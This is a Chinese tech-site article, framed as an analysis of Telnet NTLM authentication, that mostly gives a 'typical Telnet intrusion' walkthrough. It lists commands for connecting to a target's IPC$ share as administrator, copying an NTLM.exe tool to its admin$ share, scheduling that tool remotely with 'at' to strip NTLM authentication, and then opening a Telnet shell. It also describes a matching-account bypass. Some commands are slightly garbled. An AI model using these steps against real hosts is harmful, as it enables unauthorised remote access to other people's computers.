Telnet身份验证体系的分析

网络 网络管理
文章摘要:作为非常著名的Telnet协议,我们通常都会担心它的安全。那么微软也对Telnet的安全实施进行了改善,这里介绍的就是Telnet身份验证。

Telnet身份验证也就是NTLM验证,是微软为了保证Telnet登录安全的一个验证体系。那么这个功能如何实现呢?这里我们就来详细介绍一下。由于Telnet功能太强大,而且也是入侵者使用最频繁的登录手段之一,因此微软公司添加了Telnet身份验证系统,称为NTLM验证,它要求Telnet终端除了需要有Telnet服务主机的用户名和密码外,还需要满足NTLM验证关系.NTLM验证大大增强了Telnet主机的安全性,就像一只拦路虎把很多入侵者拒之门外.(关于NTLM我有写一个专门帖子.各位可以去看看)

Telnet身份验证1.使用Telnet连接主机

指令格式(cmd):Telnet 192.168.0.0 连接端口号

如果要断开.就是exit.

Telnet身份验证2.典型Telnet入侵攻略

第一步:建立IPC$连接

第二步:开启远程Telnet连接,首先在cmd(确定此时的根目录是目标的)输入指令.service  开启service项目.仔细找找.就有Telnet服务项.把它打开.

第三步:取消IPC$连接:net use 192.168.0.0 /del

第四步:去掉NTLM验证,如果没有去除目标上的NTLM验证,在登录目标的电脑的时候就会失败.

其实方法有很多种.就介绍最常用的一个.也是最简单的方法吧.

首先,在本地计算机上建立一个与远程主机上相同的账号和密码.

指令:net localgroup alpha /add不过确定对方的账号也是alpha.因为要相同的.

第二步:通过"开始"→"程序"→"附件"找到"命令提示符",使用鼠标右键单击"命令提示符",然后选择"属性".

在"以其他用户身份运行(U)"前面挑上挑.然后点."确定"接着.仍然按照上述路径找到"命令提示符"(cmd).之后用左健打开它.

之后写上用户名和密码.alpha的

然后点确定.得到cmd shell框.

之后输入我们的指令:Telnet 192.168.0.0

现在就会显示一个更新后的cmd shell.这个shell就192.168.0.0上的.

其实去掉Telnet身份验证的方法很多.再介绍给大家一个方法.

这个方法就是超级菜鸟话.因为我们需要用到一个工具.NTLM.exe.这个工具就像是3389.exe一样.只要把3389.exe传到一台机器上去执行.那台机器上的3389端口就会自动打开.

NTLM.exe的运作概念和3389.exe是一样的.我们需要做的就是把我们的NTLM.exe传到192.168.0.0这个机器上.

首先:开cmd.

然后输入指令:net use \\192.168.0.0\ipc$*""\user:administrator

之后再输入指令:copy c:\NTLM.exe \\192.168.0.0\admin$

解释一下:\admin$是使用192.168.0.0主机上的admin用户共享权限.

然后再输入察看时间指令:net time \\192.168.0.0

我们假如对方的时间是2007/9/21 下午3点21分.

之后再输入执行指令:at \\192.168.0.0 15:22 NTLM.exe

解释一下:15:22是24小时至的下午3点22分.cmd shell输入指令时一定要写24小时的.

之后当按回车确定后得到:新增加一项作业    
或者是什么指令成功完成的提示字后.等待1分钟.让cmd完成我们的shell command.

之后我们再输入指令:Telnet 192.168.0.0

Ok.大功告成.

如果要恢复Telnet身份验证.我们要用到一个shell工具:resumeTelnet.exe

resumeTelnet.exe使用的方法是这样的.

命令格式:ResumeTelnet.exe \\\\server name password

其中server name是主机域名或者是IP都可以.我们就写192.168.0.0

password当然就是密码了.

回车确定.当显示the command completed successfully后.一切完成.

责任编辑:佟健 来源: csdn.net
相关推荐

2010-07-19 17:30:47

2010-09-06 11:24:47

CHAP验证PPP身份验证

2012-04-10 09:36:58

2013-07-21 18:32:13

iOS开发ASIHTTPRequ

2011-02-21 10:54:45

2012-10-23 16:12:35

2009-04-09 23:44:08

软件身份验证用户

2022-10-31 10:00:00

2010-11-30 15:31:38

SharePoint Kerberos

2021-07-19 10:10:15

身份验证漏洞Windows Hel

2010-11-03 16:07:38

DB2身份验证

2012-02-20 09:55:41

ibmdw

2021-08-27 10:40:49

GitHubGitLinux

2011-05-23 10:37:03

2010-10-22 14:59:22

2011-05-10 09:09:36

身份验证HID Global

2015-01-28 10:00:49

2024-02-02 08:56:54

2021-08-30 14:23:41

身份验证隐私管理网络安全

2021-06-03 08:56:34

密码身份验证无密码
点赞
收藏

51CTO技术栈公众号